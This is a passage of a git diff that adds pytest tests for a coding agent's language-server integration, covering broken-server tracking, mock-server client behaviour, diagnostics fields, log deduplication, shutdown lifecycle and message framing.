+the binary is wedged), the inner spawn task is cancelled — but the
+inner exception handler that adds to ``_broken`` never runs.  Without
+the service-layer fallback added in this module, every subsequent
+edit re-pays the full timeout cost until the process exits.
+
+This module verifies:
+- ``_mark_broken_for_file`` adds the right key
+- ``enabled_for`` short-circuits on broken keys
+- a missing binary is broken-set'd after one snapshot attempt
+"""
+from __future__ import annotations
+
+import os
+import sys
+from pathlib import Path
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from agent.lsp.manager import LSPService
+from agent.lsp.servers import SERVERS, ServerContext, ServerDef, SpawnSpec
+from agent.lsp.workspace import clear_cache
+
+
+@pytest.fixture(autouse=True)
+def _clear_workspace_cache():
+    clear_cache()
+    yield
+    clear_cache()
+
+
+def _make_git_workspace(tmp_path: Path) -> Path:
+    """Build a minimal git repo with a pyproject so pyright's root resolver fires."""
+    repo = tmp_path / "repo"
+    repo.mkdir()
+    (repo / ".git").mkdir()
+    (repo / "pyproject.toml").write_text("[project]\nname='t'\n")
+    return repo
+
+
+def test_mark_broken_for_file_adds_correct_key(tmp_path, monkeypatch):
+    """``_mark_broken_for_file`` keys the broken-set on
+    (server_id, per_server_root) so subsequent ``enabled_for`` calls
+    for files in the same project skip immediately."""
+    repo = _make_git_workspace(tmp_path)
+    monkeypatch.chdir(str(repo))
+    src = repo / "x.py"
+    src.write_text("")
+
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        svc._mark_broken_for_file(str(src), RuntimeError("simulated"))
+        # The pyright server resolves to the repo root via pyproject.toml.
+        assert ("pyright", str(repo)) in svc._broken
+    finally:
+        svc.shutdown()
+
+
+def test_enabled_for_returns_false_after_broken(tmp_path, monkeypatch):
+    """Once a (server_id, root) pair is in the broken-set,
+    ``enabled_for`` returns False so the file_operations layer skips
+    the LSP path entirely."""
+    repo = _make_git_workspace(tmp_path)
+    monkeypatch.chdir(str(repo))
+    src = repo / "x.py"
+    src.write_text("")
+
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        # Initially enabled.
+        assert svc.enabled_for(str(src)) is True
+        # Mark broken.
+        svc._mark_broken_for_file(str(src), RuntimeError("simulated"))
+        # Now disabled — the broken-set short-circuits.
+        assert svc.enabled_for(str(src)) is False
+    finally:
+        svc.shutdown()
+
+
+def test_enabled_for_other_file_in_same_project_also_skipped(tmp_path, monkeypatch):
+    """The broken key is (server_id, root), so ALL files routed through
+    the same server in the same project are skipped — not just the one
+    that triggered the failure."""
+    repo = _make_git_workspace(tmp_path)
+    monkeypatch.chdir(str(repo))
+    a = repo / "a.py"
+    a.write_text("")
+    b = repo / "b.py"
+    b.write_text("")
+
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        svc._mark_broken_for_file(str(a), RuntimeError("simulated"))
+        # Both files in the same project skip pyright now.
+        assert svc.enabled_for(str(a)) is False
+        assert svc.enabled_for(str(b)) is False
+    finally:
+        svc.shutdown()
+
+
+def test_unrelated_project_not_affected_by_broken(tmp_path, monkeypatch):
+    """Marking pyright broken for project A must NOT affect project B."""
+    repo_a = _make_git_workspace(tmp_path)
+    repo_b = tmp_path / "repo-b"
+    repo_b.mkdir()
+    (repo_b / ".git").mkdir()
+    (repo_b / "pyproject.toml").write_text("[project]\nname='b'\n")
+    a_src = repo_a / "x.py"
+    a_src.write_text("")
+    b_src = repo_b / "x.py"
+    b_src.write_text("")
+
+    monkeypatch.chdir(str(repo_a))
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        svc._mark_broken_for_file(str(a_src), RuntimeError("simulated"))
+        # Project A skipped.
+        assert svc.enabled_for(str(a_src)) is False
+        # Project B still enabled — the broken key is per-project.
+        monkeypatch.chdir(str(repo_b))
+        assert svc.enabled_for(str(b_src)) is True
+    finally:
+        svc.shutdown()
+
+
+def test_mark_broken_handles_missing_server_silently(tmp_path):
+    """If the file extension doesn't match any registered server,
+    ``_mark_broken_for_file`` no-ops — nothing to mark."""
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        # No registered server for .xyz; must not raise.
+        svc._mark_broken_for_file(str(tmp_path / "weird.xyz"), RuntimeError("x"))
+        assert len(svc._broken) == 0
+    finally:
+        svc.shutdown()
+
+
+def test_mark_broken_handles_no_workspace_silently(tmp_path):
+    """File outside any git worktree → no workspace → no key to add."""
+    src = tmp_path / "orphan.py"
+    src.write_text("")
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        svc._mark_broken_for_file(str(src), RuntimeError("x"))
+        assert len(svc._broken) == 0
+    finally:
+        svc.shutdown()
+
+
+def test_snapshot_failure_marks_broken_via_outer_timeout(tmp_path, monkeypatch):
+    """End-to-end: ``snapshot_baseline``'s outer ``_loop.run`` timeout
+    triggers ``_mark_broken_for_file``, so a second call to
+    ``enabled_for`` returns False."""
+    repo = _make_git_workspace(tmp_path)
+    monkeypatch.chdir(str(repo))
+    src = repo / "x.py"
+    src.write_text("")
+
+    svc = LSPService(
+        enabled=True,
+        wait_mode="document",
+        wait_timeout=2.0,
+        install_strategy="manual",
+    )
+    try:
+        # Force the inner snapshot coroutine to raise.
+        async def boom(_path):
+            raise RuntimeError("outer-timeout simulated")
+
+        with patch.object(svc, "_snapshot_async", boom):
+            assert svc.enabled_for(str(src)) is True
+            svc.snapshot_baseline(str(src))
+
+        # After the failure, the file's pair is in the broken-set and
+        # ``enabled_for`` skips it.
+        assert ("pyright", str(repo)) in svc._broken
+        assert svc.enabled_for(str(src)) is False
+    finally:
+        svc.shutdown()
diff --git a/tests/agent/lsp/test_client_e2e.py b/tests/agent/lsp/test_client_e2e.py
new file mode 100644
index 00000000000..f5a2afc979f
--- /dev/null
+++ b/tests/agent/lsp/test_client_e2e.py
@@ -0,0 +1,143 @@
+"""End-to-end client tests against the in-process mock LSP server.
+
+Spins up :file:`_mock_lsp_server.py` as an actual subprocess, drives
+it through real LSP traffic, and asserts diagnostic flow.  This is
+the closest thing we have to integration coverage without requiring
+pyright/gopls/etc. to be installed in CI.
+"""
+from __future__ import annotations
+
+import asyncio
+import os
+import sys
+from pathlib import Path
+
+import pytest
+
+from agent.lsp.client import LSPClient
+
+
+MOCK_SERVER = str(Path(__file__).parent / "_mock_lsp_server.py")
+
+
+def _client(workspace: Path, script: str = "clean") -> LSPClient:
+    env = {"MOCK_LSP_SCRIPT": script, "PYTHONPATH": os.environ.get("PYTHONPATH", "")}
+    return LSPClient(
+        server_id=f"mock-{script}",
+        workspace_root=str(workspace),
+        command=[sys.executable, MOCK_SERVER],
+        env=env,
+        cwd=str(workspace),
+    )
+
+
+@pytest.mark.asyncio
+async def test_client_lifecycle_clean(tmp_path: Path):
+    """Full lifecycle: spawn, initialize, open, get clean diagnostics, shutdown."""
+    f = tmp_path / "x.py"
+    f.write_text("print('hi')\n")
+
+    client = _client(tmp_path, "clean")
+    await client.start()
+    try:
+        assert client.is_running
+        version = await client.open_file(str(f), language_id="python")
+        assert version == 0
+        await client.wait_for_diagnostics(str(f), version, mode="document")
+        diags = client.diagnostics_for(str(f))
+        assert diags == []
+    finally:
+        await client.shutdown()
+    assert not client.is_running
+
+
+@pytest.mark.asyncio
+async def test_client_receives_published_errors(tmp_path: Path):
+    f = tmp_path / "x.py"
+    f.write_text("print('hi')\n")
+
+    client = _client(tmp_path, "errors")
+    await client.start()
+    try:
+        version = await client.open_file(str(f), language_id="python")
+        await client.wait_for_diagnostics(str(f), version, mode="document")
+        diags = client.diagnostics_for(str(f))
+        assert len(diags) == 1
+        d = diags[0]
+        assert d["severity"] == 1
+        assert d["code"] == "MOCK001"
+        assert d["source"] == "mock-lsp"
+        assert "synthetic error" in d["message"]
+    finally:
+        await client.shutdown()
+
+
+@pytest.mark.asyncio
+async def test_client_didchange_bumps_version(tmp_path: Path):
+    f = tmp_path / "x.py"
+    f.write_text("print('hi')\n")
+
+    client = _client(tmp_path, "errors")
+    await client.start()
+    try:
+        v0 = await client.open_file(str(f), language_id="python")
+        f.write_text("print('hi 2')\n")
+        v1 = await client.open_file(str(f), language_id="python")  # re-open path = didChange
+        assert v1 == v0 + 1
+        await client.wait_for_diagnostics(str(f), v1, mode="document")
+        # Mock pushed a diagnostic for both events; merged view has one
+        # entry (push store keyed by file path).
+        diags = client.diagnostics_for(str(f))
+        assert len(diags) == 1
+    finally:
+        await client.shutdown()
+
+
+@pytest.mark.asyncio
+async def test_client_handles_crashing_server(tmp_path: Path):
+    """When the server exits right after initialize, subsequent requests
+    fail gracefully (not hang)."""
+    f = tmp_path / "x.py"
+    f.write_text("")
+
+    client = _client(tmp_path, "crash")
+    await client.start()  # should succeed (mock answers initialize before crashing)
+    # Give the OS a moment to deliver the EOF.
+    await asyncio.sleep(0.2)
+    # The reader loop should detect EOF and mark pending requests as failed.
+    try:
+        await asyncio.wait_for(
+            client.open_file(str(f), language_id="python"), timeout=2.0
+        )
+    except Exception:
+        pass  # any exception is acceptable; the contract is "doesn't hang"
+    await client.shutdown()
+
+
+@pytest.mark.asyncio
+async def test_client_shutdown_idempotent(tmp_path: Path):
+    """Calling shutdown twice must be safe."""
+    f = tmp_path / "x.py"
+    f.write_text("")
+    client = _client(tmp_path, "clean")
+    await client.start()
+    await client.shutdown()
+    await client.shutdown()  # must not raise
+
+
+@pytest.mark.asyncio
+async def test_client_diagnostics_are_deduped(tmp_path: Path):
+    """Repeated identical pushes must not produce duplicate diagnostics."""
+    f = tmp_path / "x.py"
+    f.write_text("")
+    client = _client(tmp_path, "errors")
+    await client.start()
+    try:
+        for _ in range(3):
+            v = await client.open_file(str(f), language_id="python")
+            await client.wait_for_diagnostics(str(f), v, mode="document")
+        diags = client.diagnostics_for(str(f))
+        # Push store overwrites on every notification — should have 1.
+        assert len(diags) == 1
+    finally:
+        await client.shutdown()
diff --git a/tests/agent/lsp/test_diagnostics_field.py b/tests/agent/lsp/test_diagnostics_field.py
new file mode 100644
index 00000000000..6cb0c2896ce
--- /dev/null
+++ b/tests/agent/lsp/test_diagnostics_field.py
@@ -0,0 +1,146 @@
+"""Tests for the ``lsp_diagnostics`` field on WriteResult / PatchResult.
+
+The field exists so the agent can read syntax errors (``lint``) and
+semantic errors (``lsp_diagnostics``) as separate signals rather than
+having LSP output prepended to the lint string.
+"""
+from __future__ import annotations
+
+import os
+import sys
+import tempfile
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from tools.environments.local import LocalEnvironment
+from tools.file_operations import (
+    PatchResult,
+    ShellFileOperations,
+    WriteResult,
+)
+
+
+# ---------------------------------------------------------------------------
+# Dataclass shape
+# ---------------------------------------------------------------------------
+
+
+def test_writeresult_lsp_diagnostics_optional():
+    r = WriteResult()
+    assert r.lsp_diagnostics is None
+
+
+def test_writeresult_to_dict_omits_field_when_none():
+    r = WriteResult(bytes_written=10)
+    assert "lsp_diagnostics" not in r.to_dict()
+
+
+def test_writeresult_to_dict_includes_field_when_set():
+    r = WriteResult(bytes_written=10, lsp_diagnostics="<diagnostics>...</diagnostics>")
+    d = r.to_dict()
+    assert d["lsp_diagnostics"] == "<diagnostics>...</diagnostics>"
+
+
+def test_patchresult_to_dict_includes_field_when_set():
+    r = PatchResult(success=True, lsp_diagnostics="ERROR [1:1] thing")
+    d = r.to_dict()
+    assert d["lsp_diagnostics"] == "ERROR [1:1] thing"
+
+
+def test_patchresult_to_dict_omits_field_when_none():
+    r = PatchResult(success=True)
+    assert "lsp_diagnostics" not in r.to_dict()
+
+
+def test_patchresult_to_dict_omits_field_when_empty_string():
+    """Empty string counts as falsy — agent shouldn't see an empty field."""
+    r = PatchResult(success=True, lsp_diagnostics="")
+    assert "lsp_diagnostics" not in r.to_dict()
+
+
+# ---------------------------------------------------------------------------
+# Channel separation: lint and lsp_diagnostics stay independent
+# ---------------------------------------------------------------------------
+
+
+def test_lint_and_lsp_diagnostics_are_separate_channels():
+    """A WriteResult can carry BOTH a syntax-error lint AND an LSP
+    diagnostic block.  They belong in separate fields."""
+    r = WriteResult(
+        bytes_written=42,
+        lint={"status": "error", "output": "SyntaxError: ..."},
+        lsp_diagnostics="<diagnostics>ERROR [1:5] type mismatch</diagnostics>",
+    )
+    d = r.to_dict()
+    assert "lint" in d
+    assert "lsp_diagnostics" in d
+    assert d["lint"]["output"] == "SyntaxError: ..."
+    assert "type mismatch" in d["lsp_diagnostics"]
+
+
+# ---------------------------------------------------------------------------
+# write_file populates the field via _maybe_lsp_diagnostics
+# ---------------------------------------------------------------------------
+
+
+def test_write_file_populates_lsp_diagnostics_when_layer_returns_block(tmp_path):
+    """When the LSP layer returns a non-empty block, write_file puts it
+    into the ``lsp_diagnostics`` field — NOT into ``lint.output``."""
+    fops = ShellFileOperations(LocalEnvironment(cwd=str(tmp_path)))
+    target = tmp_path / "x.py"
+
+    block = "<diagnostics file=\"x.py\">\nERROR [1:1] problem\n</diagnostics>"
+
+    with patch.object(fops, "_maybe_lsp_diagnostics", return_value=block):
+        res = fops.write_file(str(target), "x = 1\n")
+
+    assert res.lsp_diagnostics == block
+    # Lint is the syntax check, which is clean for "x = 1" — must NOT
+    # have the LSP block folded into it.
+    assert res.lint == {"status": "ok", "output": ""}
+
+
+def test_write_file_lsp_diagnostics_none_when_layer_returns_empty(tmp_path):
+    fops = ShellFileOperations(LocalEnvironment(cwd=str(tmp_path)))
+    target = tmp_path / "x.py"
+
+    with patch.object(fops, "_maybe_lsp_diagnostics", return_value=""):
+        res = fops.write_file(str(target), "x = 1\n")
+
+    assert res.lsp_diagnostics is None
+
+
+def test_write_file_skips_lsp_when_syntax_failed(tmp_path):
+    """If the syntax check finds errors, the LSP layer should not be
+    consulted (a file that won't parse won't yield meaningful semantic
+    diagnostics)."""
+    fops = ShellFileOperations(LocalEnvironment(cwd=str(tmp_path)))
+    target = tmp_path / "broken.py"
+
+    with patch.object(fops, "_maybe_lsp_diagnostics") as mock_lsp:
+        res = fops.write_file(str(target), "def x(:\n")  # syntax error
+    assert mock_lsp.call_count == 0
+    assert res.lsp_diagnostics is None
+    assert res.lint["status"] == "error"
+
+
+# ---------------------------------------------------------------------------
+# patch_replace propagates the field from the inner write_file
+# ---------------------------------------------------------------------------
+
+
+def test_patch_replace_propagates_lsp_diagnostics(tmp_path):
+    """patch_replace's internal write_file populates lsp_diagnostics —
+    the outer PatchResult must carry it forward."""
+    fops = ShellFileOperations(LocalEnvironment(cwd=str(tmp_path)))
+    target = tmp_path / "x.py"
+    target.write_text("x = 1\n")
+
+    block = "<diagnostics>ERROR [1:5] semantic issue</diagnostics>"
+
+    with patch.object(fops, "_maybe_lsp_diagnostics", return_value=block):
+        res = fops.patch_replace(str(target), "x = 1", "x = 2")
+
+    assert res.success is True
+    assert res.lsp_diagnostics == block
diff --git a/tests/agent/lsp/test_eventlog.py b/tests/agent/lsp/test_eventlog.py
new file mode 100644
index 00000000000..1686cc6adbd
--- /dev/null
+++ b/tests/agent/lsp/test_eventlog.py
@@ -0,0 +1,199 @@
+"""Tests for the structured logging dedup model.
+
+The contract: a 1000-write session in one project should emit exactly
+ONE INFO line ("active for <root>") at the default INFO threshold.
+Steady-state events stay at DEBUG; first-time-seen events surface
+once at INFO/WARNING.
+"""
+from __future__ import annotations
+
+import logging
+
+import pytest
+
+from agent.lsp import eventlog
+
+
+@pytest.fixture(autouse=True)
+def _reset():
+    eventlog.reset_announce_caches()
+    yield
+    eventlog.reset_announce_caches()
+
+
+@pytest.fixture
+def caplog_lsp(caplog):
+    caplog.set_level(logging.DEBUG, logger="hermes.lint.lsp")
+    return caplog
+
+
+# ---------------------------------------------------------------------------
+# Steady-state silence (DEBUG)
+# ---------------------------------------------------------------------------
+
+
+def test_clean_emits_at_debug(caplog_lsp):
+    for _ in range(10):
+        eventlog.log_clean("pyright", "/proj/x.py")
+    info_records = [r for r in caplog_lsp.records if r.levelno >= logging.INFO]
+    debug_records = [r for r in caplog_lsp.records if r.levelno == logging.DEBUG]
+    assert info_records == []
+    assert len(debug_records) == 10
+
+
+def test_disabled_emits_at_debug(caplog_lsp):
+    eventlog.log_disabled("pyright", "/x.py", "feature off")
+    eventlog.log_disabled("pyright", "/x.py", "ext not mapped")
+    assert all(r.levelno == logging.DEBUG for r in caplog_lsp.records)
+
+
+# ---------------------------------------------------------------------------
+# State transitions: INFO once, DEBUG thereafter
+# ---------------------------------------------------------------------------
+
+
+def test_active_for_fires_once_per_root(caplog_lsp):
+    for _ in range(50):
+        eventlog.log_active("pyright", "/proj")
+    info_records = [
+        r for r in caplog_lsp.records
+        if r.levelno == logging.INFO and "active for" in r.getMessage()
+    ]
+    assert len(info_records) == 1
+
+
+def test_active_for_fires_per_distinct_root(caplog_lsp):
+    eventlog.log_active("pyright", "/proj-a")
+    eventlog.log_active("pyright", "/proj-b")
+    info = [r for r in caplog_lsp.records if r.levelno == logging.INFO]
+    assert len(info) == 2
+
+
+def test_active_for_separate_per_server(caplog_lsp):
+    eventlog.log_active("pyright", "/proj")
+    eventlog.log_active("typescript", "/proj")
+    info = [r for r in caplog_lsp.records if r.levelno == logging.INFO]
+    assert len(info) == 2
+
+
+def test_no_project_root_fires_once_per_path(caplog_lsp):
+    for _ in range(5):
+        eventlog.log_no_project_root("pyright", "/orphan.py")
+    info = [r for r in caplog_lsp.records if r.levelno == logging.INFO]
+    assert len(info) == 1
+
+
+# ---------------------------------------------------------------------------
+# Diagnostics events fire INFO every time
+# ---------------------------------------------------------------------------
+
+
+def test_diagnostics_always_info(caplog_lsp):
+    for i in range(5):
+        eventlog.log_diagnostics("pyright", f"/x{i}.py", 1)
+    info = [r for r in caplog_lsp.records if r.levelno == logging.INFO]
+    assert len(info) == 5
+    assert all("diags" in r.getMessage() for r in info)
+
+
+# ---------------------------------------------------------------------------
+# Action-required: WARNING once, DEBUG thereafter (or per call for novel events)
+# ---------------------------------------------------------------------------
+
+
+def test_server_unavailable_warns_once_per_binary(caplog_lsp):
+    for _ in range(20):
+        eventlog.log_server_unavailable("pyright", "pyright-langserver")
+    warns = [r for r in caplog_lsp.records if r.levelno == logging.WARNING]
+    assert len(warns) == 1
+    assert "pyright-langserver" in warns[0].getMessage()
+
+
+def test_server_unavailable_separate_per_binary(caplog_lsp):
+    eventlog.log_server_unavailable("pyright", "pyright-langserver")
+    eventlog.log_server_unavailable("typescript", "typescript-language-server")
+    warns = [r for r in caplog_lsp.records if r.levelno == logging.WARNING]
+    assert len(warns) == 2
+
+
+def test_no_server_configured_warns_once(caplog_lsp):
+    for _ in range(10):
+        eventlog.log_no_server_configured("pyright")
+    warns = [r for r in caplog_lsp.records if r.levelno == logging.WARNING]
+    assert len(warns) == 1
+
+
+def test_timeout_warns_every_call(caplog_lsp):
+    for _ in range(3):
+        eventlog.log_timeout("pyright", "/x.py")
+    warns = [r for r in caplog_lsp.records if r.levelno == logging.WARNING]
+    assert len(warns) == 3
+
+
+def test_server_error_warns_every_call(caplog_lsp):
+    for _ in range(3):
+        eventlog.log_server_error("pyright", "/x.py", RuntimeError("boom"))
+    warns = [r for r in caplog_lsp.records if r.levelno == logging.WARNING]
+    assert len(warns) == 3
+
+
+def test_spawn_failed_warns(caplog_lsp):
+    eventlog.log_spawn_failed("pyright", "/proj", FileNotFoundError("nope"))
+    warns = [r for r in caplog_lsp.records if r.levelno == logging.WARNING]
+    assert len(warns) == 1
+    assert "spawn/initialize failed" in warns[0].getMessage()
+
+
+# ---------------------------------------------------------------------------
+# Format: log lines all carry the lsp[<server_id>] prefix for grep
+# ---------------------------------------------------------------------------
+
+
+def test_log_lines_use_lsp_prefix(caplog_lsp):
+    eventlog.log_clean("pyright", "/x.py")
+    eventlog.log_active("pyright", "/proj")
+    eventlog.log_diagnostics("typescript", "/y.ts", 2)
+    for r in caplog_lsp.records:
+        assert r.getMessage().startswith("lsp[")
+
+
+# ---------------------------------------------------------------------------
+# Steady-state contract: 1000 clean writes → 1 INFO at most
+# ---------------------------------------------------------------------------
+
+
+def test_thousand_clean_writes_emit_one_info(caplog_lsp):
+    """A long session writes lots of files cleanly; agent.log should
+    show ONE 'active for' INFO and zero other INFO lines."""
+    eventlog.log_active("pyright", "/proj")
+    for _ in range(1000):
+        eventlog.log_clean("pyright", "/proj/x.py")
+    info_records = [r for r in caplog_lsp.records if r.levelno == logging.INFO]
+    assert len(info_records) == 1
+    assert "active for" in info_records[0].getMessage()
+
+
+# ---------------------------------------------------------------------------
+# Path shortening
+# ---------------------------------------------------------------------------
+
+
+def test_short_path_uses_relative_when_inside_cwd(tmp_path, monkeypatch):
+    monkeypatch.chdir(tmp_path)
+    sub = tmp_path / "x.py"
+    sub.write_text("")
+    out = eventlog._short_path(str(sub))
+    assert out == "x.py"
+
+
+def test_short_path_keeps_absolute_when_outside(tmp_path, monkeypatch):
+    monkeypatch.chdir(tmp_path / "a") if (tmp_path / "a").exists() else None
+    monkeypatch.chdir(tmp_path)
+    other = "/var/log/foo.txt"
+    out = eventlog._short_path(other)
+    # Outside cwd: keeps absolute (no leading "../")
+    assert out == "/var/log/foo.txt" or not out.startswith("..")
+
+
+def test_short_path_handles_empty_string():
+    assert eventlog._short_path("") == ""
diff --git a/tests/agent/lsp/test_lifecycle.py b/tests/agent/lsp/test_lifecycle.py
new file mode 100644
index 00000000000..2fc12b10520
--- /dev/null
+++ b/tests/agent/lsp/test_lifecycle.py
@@ -0,0 +1,144 @@
+"""Tests for service-singleton lifecycle: atexit handler, idempotent shutdown.
+
+These cover the exit-cleanup behavior added to plug the language-server
+process leak — without the atexit hook, ``hermes chat`` exits while
+pyright/gopls/etc. are still alive on the host.
+"""
+from __future__ import annotations
+
+import atexit
+from unittest.mock import MagicMock, patch
+
+import pytest
+
+from agent import lsp as lsp_module
+
+
+@pytest.fixture(autouse=True)
+def _reset_singleton():
+    """Force a clean module state before each test.
+
+    Tests in this file share process-global state (the lazy
+    singleton + atexit registration flag); reset both before and
+    after every test so order doesn't matter.
+    """
+    lsp_module._service = None
+    lsp_module._atexit_registered = False
+    yield
+    lsp_module._service = None
+    lsp_module._atexit_registered = False
+
+
+def test_get_service_registers_atexit_handler_once(monkeypatch):
+    """First call to ``get_service`` must register an atexit handler;
+    subsequent calls must NOT register another one (Python's ``atexit``
+    runs every registered callable, so a duplicate would shutdown
+    twice — harmless but wasteful)."""
+    fake_svc = MagicMock()
+    fake_svc.is_active.return_value = True
+    monkeypatch.setattr(
+        lsp_module.LSPService, "create_from_config", classmethod(lambda cls: fake_svc)
+    )
+
+    registrations = []
+
+    def fake_register(fn):
+        registrations.append(fn)
+
+    monkeypatch.setattr(atexit, "register", fake_register)
+
+    a = lsp_module.get_service()
+    b = lsp_module.get_service()
+    c = lsp_module.get_service()
+
+    assert a is fake_svc
+    assert b is fake_svc
+    assert c is fake_svc
+    assert len(registrations) == 1
+    # The registered callable must be our internal shutdown wrapper.
+    assert registrations[0] is lsp_module._atexit_shutdown
+
+
+def test_atexit_shutdown_calls_shutdown_service(monkeypatch):
+    """The atexit-registered wrapper invokes ``shutdown_service`` and
+    swallows any exception — by the time atexit fires, the user has
+    already seen the response and a noisy traceback would be clutter."""
+    called = []
+    monkeypatch.setattr(
+        lsp_module, "shutdown_service", lambda: called.append("shutdown")
+    )
+    lsp_module._atexit_shutdown()
+    assert called == ["shutdown"]
+
+
+def test_atexit_shutdown_swallows_exceptions(monkeypatch):
+    def boom():
+        raise RuntimeError("server already dead")
+
+    monkeypatch.setattr(lsp_module, "shutdown_service", boom)
+    # Must not raise.
+    lsp_module._atexit_shutdown()
+
+
+def test_shutdown_service_idempotent(monkeypatch):
+    """Calling shutdown twice must be safe — first call cleans up,
+    second call no-ops (nothing to shut down)."""
+    fake_svc = MagicMock()
+    fake_svc.is_active.return_value = True
+    fake_svc.shutdown = MagicMock()
+    monkeypatch.setattr(
+        lsp_module.LSPService, "create_from_config", classmethod(lambda cls: fake_svc)
+    )
+    monkeypatch.setattr(atexit, "register", lambda fn: None)
+
+    lsp_module.get_service()
+    lsp_module.shutdown_service()
+    lsp_module.shutdown_service()  # must not raise
+
+    assert fake_svc.shutdown.call_count == 1
+
+
+def test_shutdown_service_no_op_when_never_started():
+    """Calling shutdown without ever creating the service is safe."""
+    lsp_module.shutdown_service()  # must not raise
+
+
+def test_shutdown_service_swallows_exception(monkeypatch):
+    """An exception during ``svc.shutdown()`` must not propagate —
+    the caller (often atexit) has nothing useful to do with it."""
+    fake_svc = MagicMock()
+    fake_svc.is_active.return_value = True
+    fake_svc.shutdown = MagicMock(side_effect=RuntimeError("kill -9 already"))
+    monkeypatch.setattr(
+        lsp_module.LSPService, "create_from_config", classmethod(lambda cls: fake_svc)
+    )
+    monkeypatch.setattr(atexit, "register", lambda fn: None)
+
+    lsp_module.get_service()
+    lsp_module.shutdown_service()  # must not raise
+
+
+def test_get_service_returns_none_for_inactive_service(monkeypatch):
+    """A service whose ``is_active()`` returns False is treated as
+    not running — callers see ``None`` and fall back."""
+    fake_svc = MagicMock()
+    fake_svc.is_active.return_value = False
+    monkeypatch.setattr(
+        lsp_module.LSPService, "create_from_config", classmethod(lambda cls: fake_svc)
+    )
+    monkeypatch.setattr(atexit, "register", lambda fn: None)
+
+    assert lsp_module.get_service() is None
+    # Subsequent call returns None too — but the inactive instance is
+    # cached so we don't re-build it on every check.
+    assert lsp_module.get_service() is None
+
+
+def test_get_service_returns_none_when_create_fails(monkeypatch):
+    """Service factory returning ``None`` (no config, etc.) propagates."""
+    monkeypatch.setattr(
+        lsp_module.LSPService, "create_from_config", classmethod(lambda cls: None)
+    )
+    monkeypatch.setattr(atexit, "register", lambda fn: None)
+
+    assert lsp_module.get_service() is None
diff --git a/tests/agent/lsp/test_protocol.py b/tests/agent/lsp/test_protocol.py
new file mode 100644
index 00000000000..ae95807e8c8
--- /dev/null
+++ b/tests/agent/lsp/test_protocol.py
@@ -0,0 +1,197 @@
+"""Tests for the LSP protocol framing layer.
+
+The framer is small but load-bearing — Content-Length parsing is the
+single most common reason for hand-rolled LSP clients to silently
+deadlock.  These tests exercise:
+
+- exact wire format of outgoing messages (encode_message)
+- partial-read tolerance + EOF handling (read_message)
+- envelope helpers (request, response, notification, error)
+- message classification
+"""
+from __future__ import annotations
+
+import asyncio
+import json
+import pytest
+
+from agent.lsp.protocol import (
+    ERROR_CONTENT_MODIFIED,
+    ERROR_METHOD_NOT_FOUND,
+    LSPProtocolError,
+    LSPRequestError,
+    classify_message,
+    encode_message,
+    make_error_response,
+    make_notification,
+    make_request,
+    make_response,
+    read_message,
+)
+
+
+# ---------------------------------------------------------------------------
+# encode_message
+# ---------------------------------------------------------------------------
+
+
+def test_encode_message_uses_compact_separators_and_utf8():
+    msg = {"jsonrpc": "2.0", "id": 1, "method": "x", "params": {"k": "ä"}}
+    out = encode_message(msg)
+    # Header is plain ASCII Content-Length CRLF CRLF
+    header_end = out.index(b"\r\n\r\n") + 4
+    header = out[:header_end].decode("ascii")
+    body = out[header_end:]
+    assert "Content-Length:" in header
+    declared = int(header.split("Content-Length:")[1].split("\r\n")[0].strip())
+    # Declared length must equal actual body bytes.
+    assert declared == len(body)
+    # Body parses as JSON and round-trips.
+    parsed = json.loads(body.decode("utf-8"))
+    assert parsed == msg
+    # Body uses compact separators (no spaces between kv).
+    assert b'"id":1' in body
+
+
+def test_encode_message_handles_unicode_in_strings():
+    msg = {"jsonrpc": "2.0", "method": "log", "params": {"text": "🚀 ünıcödé"}}
+    out = encode_message(msg)
+    header_end = out.index(b"\r\n\r\n") + 4
+    declared = int(out[: out.index(b"\r\n")].split(b": ")[1])
+    assert declared == len(out[header_end:])
+    assert json.loads(out[header_end:].decode("utf-8")) == msg
+
+
+# ---------------------------------------------------------------------------
+# read_message
+# ---------------------------------------------------------------------------
+
+
+async def _stream_from_bytes(data: bytes) -> asyncio.StreamReader:
+    """Build an asyncio.StreamReader pre-populated with ``data``."""
+    reader = asyncio.StreamReader()
+    reader.feed_data(data)
+    reader.feed_eof()
+    return reader
+
+
+@pytest.mark.asyncio
+async def test_read_message_round_trip():
+    msg = {"jsonrpc": "2.0", "method": "ping"}
+    reader = await _stream_from_bytes(encode_message(msg))
+    parsed = await read_message(reader)
+    assert parsed == msg
+
+
+@pytest.mark.asyncio
+async def test_read_message_clean_eof_returns_none():
+    reader = await _stream_from_bytes(b"")
+    assert await read_message(reader) is None
+
+
+@pytest.mark.asyncio
+async def test_read_message_truncated_body_raises():
+    msg = encode_message({"jsonrpc": "2.0", "method": "x"})
+    truncated = msg[: -3]  # cut the body
+    reader = await _stream_from_bytes(truncated)
+    with pytest.raises(LSPProtocolError):
+        await read_message(reader)
+
+
+@pytest.mark.asyncio
+async def test_read_message_missing_content_length_raises():
+    bad = b"X-Other: 5\r\n\r\n12345"
+    reader = await _stream_from_bytes(bad)
+    with pytest.raises(LSPProtocolError):
+        await read_message(reader)
+
+
+@pytest.mark.asyncio
+async def test_read_message_two_messages_back_to_back():
+    a = encode_message({"jsonrpc": "2.0", "method": "a"})
+    b = encode_message({"jsonrpc": "2.0", "method": "b"})
+    reader = await _stream_from_bytes(a + b)
+    assert (await read_message(reader))["method"] == "a"
+    assert (await read_message(reader))["method"] == "b"
+
+
+@pytest.mark.asyncio
+async def test_read_message_rejects_runaway_header():
+    """A pathological server that streams headers without ever emitting
+    the CRLF-CRLF terminator must not loop forever — the 8 KiB cap kicks
+    in and surfaces a protocol error."""
+    flood = (b"X-Junk: " + b"A" * 200 + b"\r\n") * 60   # ~12 KiB worth
